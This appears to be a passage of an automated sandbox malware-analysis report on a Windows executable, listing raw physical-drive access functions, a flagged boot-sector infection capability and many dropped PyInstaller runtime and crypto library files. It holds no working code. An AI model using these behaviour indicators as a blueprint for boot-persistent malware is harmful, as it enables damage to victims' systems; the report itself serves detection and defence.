Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: _snprintf,_snprintf,CreateFileA,CreateFileA,GlobalAlloc,DeviceIoControl,GlobalFree,_snprintf,CreateFileA,GlobalAlloc,GlobalAlloc,GlobalAlloc,DeviceIoControl,GlobalFree,GlobalFree,GlobalFree,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle, \\.\PhysicalDrive%d1_2_70A220A0
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: memset,wsprintfA,CreateFileA,memset,DeviceIoControl,CloseHandle,isxdigit,isxdigit,isxdigit,isprint,memcpy,CloseHandle,strlen,memcpy, \\.\PhysicalDrive%d1_2_70A22450
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\pywintypes39.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\libffi-7.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\select.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\mfc140u.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_cffi_backend.cp39-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\win32com\shell\shell.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\win32trace.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\pythoncom39.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\win32ui.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography\hazmat\bindings\_openssl.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\ucrtbase.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_pytransform.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\python39.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_keccak.pydJump to dropped file

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: _snprintf,_snprintf,CreateFileA,CreateFileA,GlobalAlloc,DeviceIoControl,GlobalFree,_snprintf,CreateFileA,GlobalAlloc,GlobalAlloc,GlobalAlloc,DeviceIoControl,GlobalFree,GlobalFree,GlobalFree,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle, \\.\PhysicalDrive%d1_2_70A220A0
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: memset,wsprintfA,CreateFileA,memset,DeviceIoControl,CloseHandle,isxdigit,isxdigit,isxdigit,isprint,memcpy,CloseHandle,strlen,memcpy, \\.\PhysicalDrive%d1_2_70A22450
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C45180 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF735C45180
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\win32trace.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\win32ui.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography\hazmat\bindings\_openssl.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l1-1-0.dllJump to dropped file
